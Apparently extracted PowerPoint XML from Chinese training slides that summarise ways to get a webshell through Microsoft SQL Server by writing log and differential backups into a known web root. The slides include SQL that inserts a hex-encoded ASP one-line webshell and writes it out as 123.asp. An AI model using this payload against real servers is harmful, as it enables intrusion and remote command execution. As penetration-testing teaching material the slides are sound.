                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>test_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>') drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>test_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>create table  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>test_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>  (a image);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0"/>
              <a:t>新建临时表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>backup log test to disk =‘C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>asp.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>’ with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0"/>
              <a:t>备份日志至指定路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>insert into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>test_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> (a) values (0x3C25657865637574652872657175657374282261222929253EDA);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>backup log test to disk = 'C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\123.asp';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3795B63F-C368-4C06-8175-C9E99FFE6478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943708" y="4976816"/>
            <a:ext cx="8304581" cy="1776149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18943949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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893661"/>
            <a:ext cx="11035409" cy="2339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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</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条件</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marL="228594" indent="-228594">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Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E3F797-4414-4EC1-B8BF-74CEEEE96FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3281659" y="3194072"/>
            <a:ext cx="5628679" cy="3384833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356153215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a:t>MSSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7956BA4-BB21-4982-B11F-09A2D7BE5396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="49244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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>总结</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条件</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marL="228594" indent="-228594">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Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径已知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>差异备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>差异备份的条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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至少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DBO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前提知道绝对路径，路径可写。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
